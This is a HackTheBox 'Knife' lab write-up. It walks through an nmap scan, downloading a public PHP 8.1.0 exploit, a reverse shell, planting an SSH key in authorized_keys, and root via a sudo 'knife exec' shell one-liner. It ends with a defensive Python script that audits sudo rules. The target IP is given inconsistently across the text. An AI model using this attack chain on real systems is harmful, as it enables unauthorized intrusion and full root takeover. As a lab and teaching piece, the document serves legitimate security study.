HTB: Knife

Praddyum Verma
Aug 29, 2021

Machine IP: 10.129.139.25
System IP: 10.10.16.12

One of the easiest boxes for a beginner. Just don't overthink it; look for vulnerabilities in the things you see on the surface.

Let's start with Network Mapper (Nmap):

nmap -A -T4 -p- -v 10.129.139.27 -oN ./nmap.txt

which outputs the following:

Nmap scan report for 10.129.139.27
Host is up (0.26s latency).
Not shown: 65431 closed ports, 102 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
| 256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_ 256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Emergent Medical Idea
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Port 80

On inspecting the response I found that it's running `php 8.1.0`, and a simple Google search landed me on an Exploit-DB entry.

We copy the Python exploit code to our system:

wget https://www.exploit-db.com/raw/49933

Then, on running the exploit, I provided the target's IP and boom, we are inside the system :)

Got the reverse shell

Inside `/home/james/user.txt` we got the user flag.

Let's check `sudo -l`:

Matching Defaults entries for james on knife:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User james may run the following commands on knife:
(root) NOPASSWD: /usr/bin/knife

But our shell isn't stable at all :') so we are not able to navigate properly.

So let's try logging in via SSH. Since we can't use wget, we need to echo our public key into authorized_keys. Note: you have to generate the key pair first (link).

echo "ssh-rsa AAA......." > ~/.ssh/authorized_keys

and then SSH in from our machine:

ssh -i id_rsa james@10.10.10.242

On executing:

sudo /usr/bin/knife

we see knife's help output, which shows that `knife exec` can run a script.

So we basically have to create a script and execute it as root. And what on earth do we want? Just execute a shell as root.

Now let's run it to get the root shell:

sudo knife exec --exec "exec '/bin/sh -i' "
What we are doing here is executing `/bin/sh -i` as root, since we are allowed to run knife with sudo; from that root shell we read the root flag.
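From the defender's side, the finding that made this box fall (a root NOPASSWD grant on a binary whose own `exec` subcommand runs arbitrary code) is easy to audit for. The following Python is an added example, not code from the writeup or from HTB; the list of code-executing binaries is an assumption you would adapt to your own hosts.

```python
import os
import re

# Assumed list of binaries whose normal features run caller-supplied code, so a
# root grant on them is a root grant on a shell. Extend it for your environment.
CODE_EXEC_BINARIES = {"knife", "sh", "bash", "python3", "perl", "ruby", "vim", "find"}

# One rule as printed by `sudo -l`: "(runas) TAG: cmd1, cmd2"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")

def parse_sudo_l(text):
    """Yield (runas, tags, [commands]) for each rule after the 'may run' header."""
    in_rules = False  # the Defaults block before the header is skipped
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        m = RULE_RE.match(line) if in_rules else None
        if not m:
            continue
        tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
        cmds = [c.strip() for c in m.group("cmds").split(",") if c.strip()]
        yield m.group("runas"), tags, cmds

def assess_sudo_rules(text):
    """One finding per command that is NOPASSWD, ALL, or a code-executing binary."""
    findings = []
    for runas, tags, cmds in parse_sudo_l(text):
        for cmd in cmds:
            reasons = []
            prog = os.path.basename(cmd.split()[0])  # path -> binary name
            if "NOPASSWD" in tags:
                reasons.append("no password required")
            if prog == "ALL":
                reasons.append("unrestricted command list")
            elif prog in CODE_EXEC_BINARIES:
                reasons.append(f"{prog} can run arbitrary code")
            if reasons:
                findings.append({"runas": runas, "command": cmd, "reasons": reasons})
    return findings

# Constructed sample: the `sudo -l` output from the writeup (secure_path trimmed).
SAMPLE = """\
Matching Defaults entries for james on knife:
    env_reset, mail_badpass
User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife
"""
```

Run `assess_sudo_rules` over the `sudo -l` output of every account you manage and you get one line per grant that needs review; the knife rule above is reported both for needing no password and for being a code-execution binary.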

Thanks for reading and stay tuned for similar writeups.
